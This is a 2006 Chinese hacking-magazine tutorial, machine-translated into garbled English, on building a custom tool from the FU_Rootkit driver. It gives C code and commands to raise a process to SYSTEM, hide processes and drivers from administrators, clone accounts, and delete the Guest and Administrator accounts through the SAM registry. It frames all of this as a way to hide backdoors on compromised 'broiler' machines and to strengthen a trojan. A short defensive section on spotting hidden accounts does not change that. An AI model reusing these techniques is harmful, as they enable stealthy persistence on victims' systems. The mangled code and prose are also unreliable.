Kept in purdah who did not know: FU_Rootkit-vulnerability warning-the black bar safety net

ID MYHACK58:6220068575
Type myhack58
Reporter 佚名
Modified 2006-04-05T00:00:00


I in 2 0 0 4 year 1 1 period of black anti-posted on the gadgets clever to delete the Guest/Administrator accounts on this article, there are a lot of friends asking about tools is how to write, in fact this tool inside most of the code is my copy FU_Rootkit over. Since friends like, these days I'm much, much better idea, then I'll talk about how to fully tap the use of FU_Rootkit! First, go to www. rootkit. com the FU_Rootkit to Down down, before it in Windows 2 0 0 0 Professional Edition the following lifting process permissions are the problem, the new version has fix this problem. FU_Rootkit can be considered a“kept in purdah who did not know”, compared to the Hxdef, the AFX RootKit to fame little more, but is gold after all is to light, it's not, today we just let it come to light! FU_Rootkit is open source, written in C language, it is easy to transplant. My development environment is Windows 2 0 0 0+SP4+VC6. To 0. FU_Rootkit the main program consists of 2 parts: Fu.exe和Msdirectx.sys the. Msdirectx. sys can be directly loaded into the core memory, the Fu. exe is the appropriate application. First take a look at some of its features: [-pl] xxx enumerate all running processes [-ph] #PID to hide the process identifier of the PID of the process [-pld] to list all loaded drivers [-phd] DRIVER_NAME to hide the specified drive [-pas] #PID to enhance the process identifier of the PID of the process privileges to SYSTEM [-prl] to list the available permissions list [-prs] #PID #privilege_name to enhance the process identifier of the PID of the process permissions to the specified permissions [-pss] #PID #account_name to change the process token and SID As can be seen FU_Rootkit can not only hide processes and drive the change process token and the SID, may also be exemplified Hook technology The Hidden process and driver. We are going to do today is the use of Msdirectx. sys finish our own hack tool set, write! Elevation of Privilege With permission we can arbitrarily operation, let the computer for us to achieve a variety of functions, so the first step is elevation of privileges. We know that to enhance the process privilege can be used in the Psu tool, FU_Rootkit it is possible to achieve this feature, it can be any process to elevate to SYSTEM privileges--not only can give the other process elevated permissions, you can also put your own process but also enhance the SYSTEM permissions of Oh in the following article you will be able to see this feature is so useful for you! The first step: 载入Msdirectx.sys Specific code, see InitDriver()function. In fact, friends of the city fully understand the code, The function is a direct copy of the past on OK. The second step: find process PID The code is as follows: const char DESTPROC[1 9] = "UserManager.exe"; // UserManager. exe is the program name of the process AddPrivilege(SE_DEBUG_NAME); //promotion process with DEBUG privileges HANDLE hRemoteProcess = NULL; DWORD pid = ProcessToPID(DESTPROC);//here pid is our process PID // ProcessToPID function is as follows: DWORD ProcessToPID(const char InputProcessName) //The process name into the process PID function { DWORD aProcesses[1 0 2 4], cbNeeded, cProcesses; unsigned int i; HANDLE hProcess = NULL; HMODULE hMod = NULL; char szProcessName[MAX_PATH] = "UnknownProcess"; //Elevate the process privileges to DEBUG permissions AddPrivilege(SE_DEBUG_NAME); // Calculate the current number of processes, aProcesses[]used to store the effective process PIDs if ( ! EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) { return 0; } cProcesses = cbNeeded / sizeof(DWORD); // By a valid PID to traverse all the process for ( i = 0; i < cProcesses; i++ ) { // Open a specific PID of the process hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i]); // Get a specific PID of a process name if ( hProcess ) { if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName) ); //Will get the process name and input the process name comparison, as the same as the returns process PID if(! stricmp(szProcessName, InputProcessName)) { CloseHandle( hProcess ); return aProcesses[i]; } } }//end of if ( hProcess ) }//end of for //Does not find the corresponding process name, returns 0 CloseHandle( hProcess ); return 0; } The third step: to enhance the process privileges to SYSTEM Specific code, see UpdateToSystem()function. So our process UserManager. exe with SYSTEM privileges. Attack article When you get broiler SYSTEM permissions, of course, to put their own back door process or drive hidden, and then clone the account, a hidden account or something, below we take a look at these functions how to use the program to achieve. 1. Clone account Dear friends see the little tree in the CA tool is not very envious, want to write your own one? In black anti-2 0 0 3 in the first 7 issues of the C language clone account of on there have been specifically described. In General, the cloned account of the method has 2 kinds: one is the use of system services SYSTEM permission to read and write SAM files; the second is the use of the drive to enhance the process permissions. We here adopt the second approach. In the C language clone account of a text, since it does not have the SYSTEM permissions, you need to manually modify the registry can be the operation the registry of the SAM folder, more trouble. In we here of course is not a problem, its code COPY over, glued to our engineering which can be. 2. Process hidden The process of hiding the real is Trojan horse virus The Essential Self-Defense art, the FU_Rootkit of the most basic functions is one of the process is hidden, first of all we want to know the process's PID or process name, and then before it can be hidden, the hidden code is as follows: DWORD HideProc(DWORD pid)//pid is you want to hide the process PID { DWORD d_bytesRead; DWORD success; if (! Initialized) { return ERROR_NOT_READY; } success = DeviceIoControl(gh_Device, IOCTL_ROOTKIT_HIDEME, (void ) &pid, sizeof(DWORD), NULL, 0, &d_bytesRead, NULL); return success; } If you want to find out the hidden process, you can use the tool RTDector0. 6 2 tool, black anti-'ve introduced. 3. Drive hide Drive hidden? Very rare. Experienced administrators will generally use the command Drivers. exe to view the loaded Driver the Drivers. exe in Windows 2 0 0 0 resource inside the package to find that See Msdirectx. sys exposed? And FU_Rootkit you can put your own Msdirectx. sys hidden, run the command:“C:\fu.exe –phd msdirectx.sys”it. Of course this feature we can also be very easily ported to our program.

Defense article Don't think FU_Rootkit to give the SYSTEM permission is just used to attack, can not defense, in fact, a Rootkit is a“double-edged sword”, the use of properly, is also the defense of the good helper. At the same time, as a famous bird, of course, is Defense first, so look at the defense. 1. System User view Now just open the hack magazines, often see what the“hidden account”, the“dead account”what, scared I'll wait for rookie jittery, often against the user management of a daze, what exactly is there problem? Here we can use LPUSER_INFO_3 read the user information, including user name, User full name, User description, login times, login permissions, and last login time and other parameters, The code is long but simple, here is not posted, anyone interested can view the DWORD CUserManagerDlg::UserALLE()function. Of course, include the account number directly from the SAM\\SAM\\Domains\\Account\\Users\\Names\read, and then with LPUSER_INFO_3 read out the account number for comparison, so you can find out the hidden account, will those hidden, not dead, all hit back to the prototype, allow you to put the account see“clearly and plainly” in. 2. Delete Guest First take a look at how to delete the Guest user. Get the SYSTEM permission, as long as the deleted in the registry SAM folder corresponding to the Guest and 000001F5 folder is OK! void CUserManagerDlg::Deleteguest() { BOOL upResult; upResult=UpdateToSystem(); //First check the process prompts the permissions to SYSTEM success no if(upResult)//if the elevation SYSTEM is successful { // Delete the GUEST user! BOOL dResult; dResult=DelNT(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\Names\\Guest");//delete the Guest folder BOOL dResult2; dResult2=DelNT(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\000001F5");//delete the guest corresponding to the ID number 000001F5 folder if(dResult&&dResult2) { AfxMessageBox("successfully deleted a GUEST user!"); } else { AfxMessageBox("delete the GUEST user failed!"); } } else { AfxMessageBox("elevate to SYSTEM privileges failed!"); } } Wherein DelNT()function is specially defined to delete the registry sub-key function. 3. Delete Administrator See the title you don't want to startle, the Administrator General is not deleted, of course you can go to control panel->Administrative Tools->Computer Management inside rename the account, you can also use the NT Resource Kit provided by the Passprop tool to enable the Administrator of the lock. We are here of course to the ultimate challenge: delete the Administrator! Code with delete the Guest user code almost, a parameter can be, respectively, delete the registry of the SAM folder in the Administrator and 000001F4 folder. And can be in the Administrator of the current user under the Remove, strong? Hey. If you only have one administrator account?, sorry, congratulations: you on the machine since there is no administrator!

Tip: It is strongly recommended to remove Administrator before be sure to first create a other name for the administrator account! According to the Microsoft information security Proceedings of say, delete the Administrator and Guest built-in account may lead to the destruction of the SAM database, but the Microsoft information security Proceedings of the author of the while statement: after his test, found no side effects.

4. Killing the thread article Friends often encounter this situation: in the Task Manager found an unknown Process, and kill off, that is permission enough, this problem in our acquisition System permissions after it is no longer a problem, now the virus, Trojans, etc. are a dual Process, Monitor each other, give us of killing the process caused great inconvenience, we need to be able to at the same time killing multiple processes. The selection of the Listview control as a process, list the control, the Checkbox option is selected, so that we can simultaneously select a plurality of processes for Avira, cool right?! 5. Listed with Hook techniques to hide processes and drive This feature is FU_Rootkit excels, and can help you find the use of HOOK technology to hide the processes and Trojans. The implementation method is relatively simple, you can go to the source code view ListProc(void *buffer, int buff_size)and ListDriv(void)function.

Herein the use of FU_Rootkit obtain SYSTEM permissions after completing a lot of practical hacks gadgets, System and Administrator permissions General look and feel are similar, but in some of the system kernel of the interaction of the details, as can be seen the System permissions to be larger. For example in the registry, certain folders, for physical memory there are Literacy and other aspects. Therefore, access to System permissions can do things far more than we said above these, I hope everyone together to dig. 上 有 很 多 开源 的 好 资源 research and extend its functionality you can write out a lot of useful small software. Its function is to add to our pony, will greatly improve their Vitality. Friends, now is not the feeling of hacking software but so that everyone can write? If so, it is worth the fee I'm a fan painstakingly。 Because the working relationship, the time is indeed limited, it is impossible to place the above functions are all one implemented in the code, in fact, already is the physical strength live, and many features are only need to put the code to COPY into it. Will delete the Guest/Administrator of small tools and FU_Rootkit the code attached, friends upgrade can you send me a copy of Oh!